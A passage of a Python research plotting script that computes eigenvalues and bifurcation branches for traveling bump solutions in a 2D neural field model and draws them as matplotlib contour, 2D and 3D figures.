E**((25*(1 + lam)**2)/(4.*nu**2) + (4*Pi**2)/25.)*Erfc((5*(1 + lam))/(2.*Sqrt(nu**2))) + \
E**((25 - 4*nu*Pi)**2/(100.*nu**2))*Erfc((25 - 4*nu*Pi)/(10.*Sqrt(nu**2))) - \
E**((25*(1 + lam) - 4*nu*Pi)**2/(100.*nu**2))*\
Erfc((25*(1 + lam) - 4*nu*Pi)/(10.*Sqrt(nu**2))) + \
E**((25 + 4*nu*Pi)**2/(100.*nu**2))*Erfc((25 + 4*nu*Pi)/(10.*Sqrt(nu**2))) - \
E**((25*(1 + lam) + 4*nu*Pi)**2/(100.*nu**2))*\
Erfc((25*(1 + lam) + 4*nu*Pi)/(10.*Sqrt(nu**2)))))/\
(125.*(2 + E**((4*Pi**2)/25.))*lam*\
(2*(2 + E**((4*Pi**2)/25.))*nu**2 - \
5*E**(25/(4.*nu**2) + (4*Pi**2)/25.)*Sqrt(nu**2)*Sqrt(Pi)*(1 + 2*Cosh((2*Pi)/nu)) + \
5*E**((25 - 4*nu*Pi)**2/(100.*nu**2))*nu*Sqrt(Pi)*\
(E**((2*Pi)/nu)*Erf(5/(2.*nu)) + Erf(5/(2.*nu) - (2*Pi)/5.)) + \
5*E**((25 + 4*nu*Pi)**2/(100.*nu**2))*nu*Sqrt(Pi)*Erf(5/(2.*nu) + (2*Pi)/5.)))
if choice == 1:
return L1
return L2
def wave_stbl_2d_gauss():
"""
compute eigenvalue as a function of traveling bump velocity in axial or diagonal directions.
the h function is given to be the negative derivative of the gaussian.
\lambda_1 &= -\frac{\nu}{\int_0^\infty e^{-s} H_1(\nu s, 0) ds} \int_0^\infty e^{-s} \frac{\pa H_1}{\pa x}(\nu s, 0)[e^{-\lambda_1 s}-1]ds,\\
\lambda_2 &= \frac{\nu}{\int_0^\infty e^{-s} H_1(\nu s, 0) ds} \int_0^\infty e^{-s} \frac{\pa H_1}{\pa y}(0, \nu s)[e^{-\lambda_2 s}-1]ds.
"""
fig = plt.figure(figsize=(8,3))
ax = fig.add_subplot(121)
ax2 = fig.add_subplot(122)
nu = np.linspace(.001,2.,100)
lam = np.linspace(-3,.5,100)
nu2 = np.linspace(.001,2.,100)
lam2 = np.linspace(-3,.5,100)
X,Y = np.meshgrid(nu,lam,indexing='xy')
X2,Y2 = np.meshgrid(nu2,lam2,indexing='xy')
#L(nu,lam,choice=1,s0=0,s1=10,sn=101):
z = L_gauss(X,Y)
z2 = L_gauss(X2,Y2,choice=2)
z[z>=5] = 5
z[z<=-5] = -5
z2[z2>=5] = 5
z2[z2<=-5] = -5
ax.plot([0,nu[-1]],[0,0],color='gray')
ax2.plot([0,nu2[-1]],[0,0],color='gray')
cs = ax.contour(X,Y,z,levels=[-0.00001,0.,.00001])
cs2 = ax2.contour(X2,Y2,z2,levels=[-0.00001,0.,.00001])
#cs = ax.contour(X,Y,z)
#cs2 = ax2.contour(X2,Y2,z2)
# remove other curves
# customize desired curve
cs.collections[0].set_color('black')
cs.collections[1].set_color('black')
cs.collections[2].set_color('black')
cs2.collections[0].set_color('black')
cs2.collections[1].set_color('black')
cs2.collections[2].set_color('black')
cs.collections[1].set_linewidth(2)
cs2.collections[1].set_linewidth(2)
ax.set_xlabel(r'$\nu$')
ax2.set_xlabel(r'$\nu$')
ax.set_ylabel(r'$\lambda_1$')
ax2.set_ylabel(r'$\lambda_2$')
return fig
def wave_exist_2d(choice='axial'):
"""
plot zeros of -nu1 + G(nu1,nu2) and -nu2 + G(nu2,nu1)
"""
nc1x = np.loadtxt('twod_wave_exist_nc_g=1x.dat')
nc1y = np.loadtxt('twod_wave_exist_nc_g=1y.dat')
nc2x = np.loadtxt('twod_wave_exist_nc_g=3x.dat')
nc2y = np.loadtxt('twod_wave_exist_nc_g=3y.dat')
# nc1 bifurcation values
bif = np.loadtxt('twod_wave_exist_br1.dat')
#bif2 = np.loadtxt('twod_wave_exist_br2.dat')
bif_diag1 = np.loadtxt('twod_wave_exist_diag1.dat')
bif_diag2 = np.loadtxt('twod_wave_exist_diag2.dat')
# clean
nc1xx,nc1xy = clean(nc1x[:,0],nc1x[:,1],tol=.05)
nc1yx,nc1yy = clean(nc1y[:,0],nc1y[:,1],tol=.05)
nc2xx,nc2xy = clean(nc2x[:,0],nc2x[:,1],tol=.1)
nc2yx,nc2yy = clean(nc2y[:,0],nc2y[:,1],tol=.1)
bifx,bify = clean(bif[:,3],bif[:,7],tol=1)
bifx2,bify2 = clean(bif[:,3],bif[:,8],tol=.2)
bif_diag1x,bif_diag1y = clean(bif_diag1[:,0],np.abs(bif_diag1[:,1]),tol=.2)
bif_diag2x,bif_diag2y = clean(bif_diag2[:,0],np.abs(bif_diag2[:,1]),tol=.2)
fig = plt.figure(figsize=(8,3))
ax1 = fig.add_subplot(121)
ax1.plot(nc1xx,nc1xy)
ax1.plot(nc1yx,nc1yy)
ax1.plot(nc2xx,nc2xy)
ax1.plot(nc2yx,nc2yy)
#ax1.plot(nc2yx,nc2yy)
ax1.annotate(r'$g=1$',
xy=(.21, .21), xycoords='data',
xytext=(.3, .75), textcoords='data',
size=12,
zorder=2,
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax1.annotate(r'$g=3$',
xy=(.934, 1.37), xycoords='data',
xytext=(1.3, 1.7), textcoords='data',
size=12,
zorder=2,
verticalalignment='top',
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax1.annotate(r'$g=3$',
alpha=0.0,
xy=(1.16, 1.16), xycoords='data',
xytext=(1.3, 1.7), textcoords='data',
size=12,
zorder=2,
verticalalignment='top',
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax1.annotate(r'$g=3$',
alpha=0.0,
xy=(1.379,.923), xycoords='data',
xytext=(1.3, 1.7), textcoords='data',
size=12,
zorder=2,
verticalalignment='top',
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
axins1 = inset_axes(ax1,
width="30%",
height="30%",
loc=8)
mark_inset(ax1, axins1, loc1=2, loc2=4, fc="none", ec="0.5")
axins1.plot(nc1xx,nc1xy)
axins1.plot(nc1yx,nc1yy)
axins1.set_xlim(.1,.3)
axins1.set_ylim(.1,.3)
#mark_inset(ax21, axins21, loc1=2, loc2=1, fc="none", ec="0.5")
plt.xticks(visible=False)
plt.yticks(visible=False)
ax2 = fig.add_subplot(122)
ax2.plot(bifx,bify,color='black')
ax2.plot(bifx2,bify2,color='black')
ax2.plot(bif_diag1x,bif_diag1y,color='black')
ax2.plot(bif_diag2x,bif_diag2y,color='black')
ax2.plot([0,5],[0,0],color='black')
ax2.annotate(r'$x$-axis direction',
xy=(1.04,.37),xycoords='data',textcoords='data',
xytext=(.6,.6),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate(r'$y$-axis direction',
xy=(1.0,.0),xycoords='data',textcoords='data',
xytext=(.55,.33),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate(r'$g^*$',
xy=(.9,.0),xycoords='data',textcoords='data',
xytext=(.8,.05),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Diagonal',
xy=(1.1,.32),xycoords='data',textcoords='data',
xytext=(1.4,.2),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Off-diagonal',
xy=(1.4,.41),xycoords='data',textcoords='data',
xytext=(1.5,.34),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Off-diagonal',
alpha=0.,
xy=(1.4,.62),xycoords='data',textcoords='data',
xytext=(1.5,.34),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
"""
import matplotlib.patches as patches
ax2.add_patch(
patches.Rectangle(
(1.17,-3),1,6,
color='red',
alpha=.25
)
)
"""
ax2.annotate('Multiple non-axial directions',xy=(3.68,.1),xycoords='data',textcoords='data',xytext=(3.,.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.plot([1.17,1.17],[-3,3],color='gray')
ax2.plot([3.,3.],[-3,3],color='gray')
ax1.set_ylabel(r'$\nu_2$')
ax1.set_xlabel(r'$\nu_1$')
ax2.set_ylabel(r'$\nu_1$')
ax2.set_xlabel(r'$g$')
ax1.set_xlim(-.05,2.)
ax1.set_ylim(-.05,2.)
ax2.set_xlim(.5,2.)
ax2.set_ylim(-.1,1)
return fig
def wave_exist_2d_v2():
# nc1 bifurcation values
L1 = np.loadtxt('twod_wave_exist_br1.dat')
L2 = np.loadtxt('twod_wave_exist_diag1.dat')
M1 = np.loadtxt('twod_wave_exist_br2.dat')
M2 = np.loadtxt('twod_wave_exist_diag2.dat')
# clean
bifx,bify = clean(L1[:,3],L1[:,7],tol=1)
bifx2,bify2 = clean(bif[:,3],bif[:,8],tol=.2)
bif_diag1x,bif_diag1y = clean(bif_diag1[:,0],np.abs(bif_diag1[:,1]),tol=.2)
bif_diag2x,bif_diag2y = clean(bif_diag2[:,0],np.abs(bif_diag2[:,1]),tol=.2)
fig = plt.figure(figsize=(8,3))
ax1 = fig.add_subplot(121)
ax1.plot(nc1xx,nc1xy)
ax1.plot(nc1yx,nc1yy)
ax1.plot(nc2xx,nc2xy)
ax1.plot(nc2yx,nc2yy)
plane1_z = 0.55
plane2_z = 0.889
g = np.linspace(0+.0*1j,2+0.*1j,1000)
# nu1 branches
L1 = Sqrt(-1 + 1.8*g)
L2 = Sqrt(-5 + (4 + b)*g + Sqrt(9 + 6*(-4 + b)*g + (4 + b)**2*g**2))/(2.*Sqrt(2))
L3 = Sqrt(-6 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2) - \
Sqrt(-4*(-5 + Sqrt(16 + (2 + b)**2*g**2)) + \
2*g*(-4 + b*(-2 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2)))))/2.
L4 = Sqrt(-6 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2) + \
Sqrt(-4*(-5 + Sqrt(16 + (2 + b)**2*g**2)) + \
2*g*(-4 + b*(-2 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2)))))/2.
L5 = 0.*g
# nu2 branches
M1 = 0.*g
M2 = np.real(Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)*(-5 + (4 + b)*g + Sqrt(9 + 6*(-4 + b)*g + (4 + b)**2*g**2))))/(2.*Sqrt(2)*Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)))))
M3 = np.real(Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)*(-6 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2) + Sqrt(-4*(-5 + Sqrt(16 + (2 + b)**2*g**2)) + 2*g*(-4 + b*(-2 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2)))))))/(2.*Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)))))
M4 = np.real(Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)*(-6 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2) - Sqrt(-4*(-5 + Sqrt(16 + (2 + b)**2*g**2)) + 2*g*(-4 + b*(-2 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2)))))))/(2.*Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)))))
M5 = Sqrt(-1 + 1.8*g)
print M2
fig = plt.figure(figsize=(10,5))
ax1 = fig.add_subplot(121, projection='3d')
ax2 = fig.add_subplot(122)
# get plane intersection idx
g_int_p1 = np.argmin(np.abs(g-plane1_z))
g_int_p2 = np.argmin(np.abs(g-plane2_z))
ax1.scatter(L1[g_int_p1],g[g_int_p1],M1[g_int_p1],color='black',s=20)
ax1.scatter(L1[g_int_p2],g[g_int_p2],M1[g_int_p2],color='black',s=20)
ax1.scatter(L2[g_int_p1],g[g_int_p1],M2[g_int_p1],color='black',s=20)
ax1.scatter(L2[g_int_p2],g[g_int_p2],M2[g_int_p2],color='black',s=20)
ax1.scatter(L3[g_int_p1],g[g_int_p1],M3[g_int_p1],color='black',s=20)
ax1.scatter(L3[g_int_p2],g[g_int_p2],M3[g_int_p2],color='black',s=20)
ax1.scatter(L4[g_int_p1],g[g_int_p1],M4[g_int_p1],color='black',s=20)
ax1.scatter(L4[g_int_p2],g[g_int_p2],M4[g_int_p2],color='black',s=20)
# plot curves in 3d
ax1.plot(L1,g,M1,color='black',lw=2)
ax1.plot(L2,g,M2,color='black',lw=2)
ax1.plot(L3,g,M3,color='black',lw=2)
ax1.plot(L4,g,M4,color='black',lw=2)
ax1.plot(L5,g,M5,color='black',lw=2)
# plot curves in 2d
ax2.plot(g,L1,color='black',lw=2)
ax2.plot(g,L2,color='black',lw=2)
ax2.plot(g,L3,color='black',lw=2)
ax2.plot(g,L4,color='black',lw=2)
# plot bifurcation planes
X,Y = np.meshgrid(np.linspace(g[0],g[-1],10),np.linspace(g[0],g[-1],10))
ax1.plot_surface(X,0.*X+plane1_z,Y,alpha=.3,color='gray')
ax1.plot_surface(X,0.*X+plane2_z,Y,alpha=.3,color='red')
# plot bifurcation lines
ax2.plot([plane1_z,plane1_z],[0,1.8],color='black',alpha=.5,lw=2)
ax2.plot([plane2_z,plane2_z],[0,1.8],color='red',alpha=.5,lw=2)
#ax1.plot([0,5],[0,0],color='black')
ax2.annotate(r'$x$-axis direction',
xy=(.65,.4),xycoords='data',textcoords='data',
xytext=(.2,1.1),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate(r'$y$-axis direction',
xy=(1.4,.0),xycoords='data',textcoords='data',
xytext=(1.3,.3),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate(r'$g^*$',
xy=(.55,.0),xycoords='data',textcoords='data',
xytext=(.4,.07),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Diagonal',
xy=(1.6,1.05),xycoords='data',textcoords='data',
xytext=(1.6,.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Off-diagonal',
xy=(1.4,.63),xycoords='data',textcoords='data',
xytext=(1.3,1.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Off-diagonal',
alpha=0.,
xy=(1.4,1.14),xycoords='data',textcoords='data',
xytext=(1.3,1.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Multiple non-axial directions',xy=(3.68,.1),xycoords='data',textcoords='data',xytext=(3.,.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax1.view_init(20,-8)
#ax1.plot([.89,.89],[-3,3],color='gray')
#ax1.plot([3.,3.],[-3,3],color='gray')
ax1.set_xlabel(r'$\nu_2$')
ax1.set_ylabel(r'$g$')
ax1.set_zlabel(r'$\nu_1$')
ax2.set_xlabel(r'$g$')
ax2.set_ylabel(r'$\nu_1$')
ax1.set_xlim(0,2.)
ax1.set_ylim(0,2.)
ax1.set_zlim(-.1,1.8)
plt.show()
return fig
def wave_exist_2d_trunc(b=.8):
"""
plot zeros of -nu1 + G(nu1,nu2) and -nu2 + G(nu2,nu1)
"""
g = np.linspace(.0,2,1000)
L1 = Sqrt(-1 + 1.8*g)
L2 = Sqrt(-5 + (4 + b)*g + Sqrt(9 + 6*(-4 + b)*g + (4 + b)**2*g**2))/(2.*Sqrt(2))
L3 = Sqrt(-6 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2) - \
Sqrt(-4*(-5 + Sqrt(16 + (2 + b)**2*g**2)) + \
2*g*(-4 + b*(-2 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2)))))/2.
L4 = Sqrt(-6 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2) + \
Sqrt(-4*(-5 + Sqrt(16 + (2 + b)**2*g**2)) + \
2*g*(-4 + b*(-2 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2)))))/2.
fig = plt.figure(figsize=(5,3))
ax1 = fig.add_subplot(111)
ax1.plot(g,L1,color='black')
ax1.plot(g,L2,color='black')
ax1.plot(g,L3,color='black')
ax1.plot(g,L4,color='black')
ax1.plot([0,5],[0,0],color='black')
ax1.annotate(r'$x$-axis direction',
xy=(.65,.4),xycoords='data',textcoords='data',
xytext=(.2,1.1),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax1.annotate(r'$y$-axis direction',
xy=(1.4,.0),xycoords='data',textcoords='data',
xytext=(1.3,.3),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax1.annotate(r'$g^*$',
xy=(.55,.0),xycoords='data',textcoords='data',
xytext=(.4,.07),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax1.annotate('Diagonal',
xy=(1.6,1.05),xycoords='data',textcoords='data',
xytext=(1.6,.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax1.annotate('Off-diagonal',
xy=(1.4,.63),xycoords='data',textcoords='data',
xytext=(1.3,1.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax1.annotate('Off-diagonal',
alpha=0.,
xy=(1.4,1.14),xycoords='data',textcoords='data',
xytext=(1.3,1.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax1.annotate('Multiple non-axial directions',xy=(3.68,.1),xycoords='data',textcoords='data',xytext=(3.,.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax1.plot([.89,.89],[-3,3],color='gray')
#ax1.plot([3.,3.],[-3,3],color='gray')
ax1.set_ylabel(r'$\nu_1$')
ax1.set_xlabel(r'$g$')
ax1.set_xlim(0,2.)
ax1.set_ylim(-.1,1.8)
return fig
def wave_exist_2d_trunc_v2(b=.8):
"""
plot zeros of -nu1 + G(nu1,nu2) and -nu2 + G(nu2,nu1)
as a function of g
"""
plane1_z = 0.55
plane2_z = 0.889
g = np.linspace(0+.0*1j,2+0.*1j,1000)
# nu1 branches
L1 = Sqrt(-1 + 1.8*g)
L2 = Sqrt(-5 + (4 + b)*g + Sqrt(9 + 6*(-4 + b)*g + (4 + b)**2*g**2))/(2.*Sqrt(2))
L3 = Sqrt(-6 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2) - \
Sqrt(-4*(-5 + Sqrt(16 + (2 + b)**2*g**2)) + \
2*g*(-4 + b*(-2 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2)))))/2.
L4 = Sqrt(-6 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2) + \
Sqrt(-4*(-5 + Sqrt(16 + (2 + b)**2*g**2)) + \
2*g*(-4 + b*(-2 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2)))))/2.
L5 = 0.*g
# nu2 branches
M1 = 0.*g
M2 = np.real(Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)*(-5 + (4 + b)*g + Sqrt(9 + 6*(-4 + b)*g + (4 + b)**2*g**2))))/(2.*Sqrt(2)*Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)))))
M3 = np.real(Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)*(-6 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2) + Sqrt(-4*(-5 + Sqrt(16 + (2 + b)**2*g**2)) + 2*g*(-4 + b*(-2 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2)))))))/(2.*Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)))))
M4 = np.real(Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)*(-6 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2) - Sqrt(-4*(-5 + Sqrt(16 + (2 + b)**2*g**2)) + 2*g*(-4 + b*(-2 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2)))))))/(2.*Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)))))
M5 = Sqrt(-1 + 1.8*g)
print M2
fig = plt.figure(figsize=(10,5))
ax1 = fig.add_subplot(121, projection='3d')
ax2 = fig.add_subplot(122)
# get plane intersection idx
g_int_p1 = np.argmin(np.abs(g-plane1_z))
g_int_p2 = np.argmin(np.abs(g-plane2_z))
ax1.scatter(L1[g_int_p1],g[g_int_p1],M1[g_int_p1],color='black',s=20)
ax1.scatter(L1[g_int_p2],g[g_int_p2],M1[g_int_p2],color='black',s=20)
ax1.scatter(L2[g_int_p1],g[g_int_p1],M2[g_int_p1],color='black',s=20)
ax1.scatter(L2[g_int_p2],g[g_int_p2],M2[g_int_p2],color='black',s=20)
ax1.scatter(L3[g_int_p1],g[g_int_p1],M3[g_int_p1],color='black',s=20)
ax1.scatter(L3[g_int_p2],g[g_int_p2],M3[g_int_p2],color='black',s=20)
ax1.scatter(L4[g_int_p1],g[g_int_p1],M4[g_int_p1],color='black',s=20)
ax1.scatter(L4[g_int_p2],g[g_int_p2],M4[g_int_p2],color='black',s=20)
# plot curves in 3d
ax1.plot(L1,g,M1,color='black',lw=2)
ax1.plot(L2,g,M2,color='black',lw=2)
ax1.plot(L3,g,M3,color='black',lw=2)
ax1.plot(L4,g,M4,color='black',lw=2)
ax1.plot(L5,g,M5,color='black',lw=2)
# plot curves in 2d
ax2.plot(g,L1,color='black',lw=2)
ax2.plot(g,L2,color='black',lw=2)
ax2.plot(g,L3,color='black',lw=2)
ax2.plot(g,L4,color='black',lw=2)
# plot bifurcation planes
X,Y = np.meshgrid(np.linspace(g[0],g[-1],10),np.linspace(g[0],g[-1],10))
ax1.plot_surface(X,0.*X+plane1_z,Y,alpha=.3,color='gray')
ax1.plot_surface(X,0.*X+plane2_z,Y,alpha=.3,color='red')
# plot bifurcation lines
ax2.plot([plane1_z,plane1_z],[0,1.8],color='black',alpha=.5,lw=2)
ax2.plot([plane2_z,plane2_z],[0,1.8],color='red',alpha=.5,lw=2)
#ax1.plot([0,5],[0,0],color='black')
ax2.annotate(r'$x$-axis direction',
xy=(.65,.4),xycoords='data',textcoords='data',
xytext=(.2,1.1),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate(r'$y$-axis direction',
xy=(1.4,.0),xycoords='data',textcoords='data',
xytext=(1.3,.3),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate(r'$g^*$',
xy=(.55,.0),xycoords='data',textcoords='data',
xytext=(.4,.07),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Diagonal',
xy=(1.6,1.05),xycoords='data',textcoords='data',
xytext=(1.6,.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Off-diagonal',
xy=(1.4,.63),xycoords='data',textcoords='data',
xytext=(1.3,1.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Off-diagonal',
alpha=0.,
xy=(1.4,1.14),xycoords='data',textcoords='data',
xytext=(1.3,1.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Multiple non-axial directions',xy=(3.68,.1),xycoords='data',textcoords='data',xytext=(3.,.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax1.view_init(20,-8)
#ax1.plot([.89,.89],[-3,3],color='gray')
#ax1.plot([3.,3.],[-3,3],color='gray')
ax1.set_xlabel(r'$\nu_2$')
ax1.set_ylabel(r'$g$')
ax1.set_zlabel(r'$\nu_1$')
ax2.set_xlabel(r'$g$')
ax2.set_ylabel(r'$\nu_1$')
ax1.set_xlim(0,2.)
ax1.set_ylim(0,2.)
ax1.set_zlim(-.1,1.8)
plt.show()
return fig
def wave_exist_2d_trunc_v3(b=.8):
"""
plot zeros of -nu1 + G(nu1,nu2) and -nu2 + G(nu2,nu1)
as a function of g
"""
plane1_z = 0.53
plane2_z = 0.88
g = np.linspace(0+.0*1j,1.5+0.*1j,100)
# nu1 branches
L1 = Sqrt(-1 + 1.8*g)
L2 = Sqrt(-5 + (4 + b)*g + Sqrt(9 + 6*(-4 + b)*g + (4 + b)**2*g**2))/(2.*Sqrt(2))
L3 = Sqrt(-6 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2) - \
Sqrt(-4*(-5 + Sqrt(16 + (2 + b)**2*g**2)) + \
2*g*(-4 + b*(-2 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2)))))/2.
L4 = Sqrt(-6 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2) + \
Sqrt(-4*(-5 + Sqrt(16 + (2 + b)**2*g**2)) + \
2*g*(-4 + b*(-2 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2)))))/2.
L5 = 0.*g
# nu2 branches
M1 = 0.*g
M2 = np.real(Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)*(-5 + (4 + b)*g + Sqrt(9 + 6*(-4 + b)*g + (4 + b)**2*g**2))))/(2.*Sqrt(2)*Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)))))
M3 = np.real(Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)*(-6 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2) + Sqrt(-4*(-5 + Sqrt(16 + (2 + b)**2*g**2)) + 2*g*(-4 + b*(-2 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2)))))))/(2.*Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)))))
M4 = np.real(Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)*(-6 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2) - Sqrt(-4*(-5 + Sqrt(16 + (2 + b)**2*g**2)) + 2*g*(-4 + b*(-2 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2)))))))/(2.*Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)))))
M5 = Sqrt(-1 + 1.8*g)
fig = plt.figure(figsize=(10,5))
ax1 = fig.add_subplot(121, projection='3d')
ax2 = fig.add_subplot(122)
# get plane intersection idx
g_int_p1 = np.argmin(np.abs(g-plane1_z))
g_int_p2 = np.argmin(np.abs(g-plane2_z))
# plot curves in 3d
# prep for plotting with different line widths
# add modified curves to figure
ax1.add_collection3d(collect3d_colorgrad(L1,g,M1))
ax1.add_collection3d(collect3d_colorgrad(L2,g,M2))
ax1.add_collection3d(collect3d_colorgrad(L3,g,M3))
ax1.add_collection3d(collect3d_colorgrad(L4,g,M4))
ax1.add_collection3d(collect3d_colorgrad(L5,g,M5))
# plot bifurcation planes
X,Y = np.meshgrid(np.linspace(0,1.2,10),np.linspace(0,1.2,10))
ax1.plot_surface(X,0.*X+plane1_z,Y,alpha=.2,color='gray')
ax1.plot_surface(X,0.*X+plane2_z,Y,alpha=.2,color='red')
# plot intersection points
# ax1.scatter(L1[g_int_p1],g[g_int_p1],M1[g_int_p1],color='black',s=30)
ax1.plot([M3[g_int_p1]],[g[g_int_p1]],[L3[g_int_p1]],color='black',marker='o',markersize=8,zorder=10)
#ax1.scatter(L1[g_int_p2],g[g_int_p2],M1[g_int_p2],color='red',s=30)
ax1.plot([np.real(L1[g_int_p2])],[np.real(g[g_int_p2])],[np.real(M1[g_int_p2])],marker='o',markersize=8,markeredgecolor='none',zorder=100,color='red')
ax1.plot([L2[g_int_p1]],[g[g_int_p1]],[M2[g_int_p1]],color='black',marker='o',markersize=8,zorder=10)
#ax1.scatter(L2[g_int_p1],g[g_int_p1],M2[g_int_p1],color='black',s=35)
ax1.plot([L2[g_int_p2]],[g[g_int_p2]],[M2[g_int_p2]],marker='o',markersize=7,markeredgecolor='none',zorder=100,color='red')
ax1.plot([L3[g_int_p1]],[g[g_int_p1]],[M3[g_int_p1]],color='black',marker='o',markersize=8,zorder=10)
ax1.scatter(L3[g_int_p1],g[g_int_p1],M3[g_int_p1],color='black',s=30)
ax1.plot([L3[g_int_p2]],[g[g_int_p2]],[M3[g_int_p2]],marker='o',markersize=6,markeredgecolor='none',zorder=100,color='red')
#ax1.scatter(L4[g_int_p1],g[g_int_p1],M4[g_int_p1],color='black',s=30)
#ax1.scatter(L4[g_int_p2],g[g_int_p2],M4[g_int_p2],color='red',s=30)
# plot curves in 2d + 2d projection in 3d plot
#ax2.plot([L1[g_int_p1],M1[g_int_p1]],color='black',marker='o',markersize=8,zorder=10)
#ax2.scatter(L1[g_int_p2],M1[g_int_p2],color='red',s=50,zorder=10)
ax1.plot([L1[g_int_p1]],[1.5],[M1[g_int_p1]],marker='o',markeredgecolor='none',color='black',markersize=8,zorder=100)
ax1.plot([L1[g_int_p2]],[1.5],[M1[g_int_p2]],marker='o',markeredgecolor='none',color='red',markersize=8,zorder=100)
ax2.plot([L2[g_int_p1]],[M2[g_int_p1]],color='black',marker='o',markersize=8)
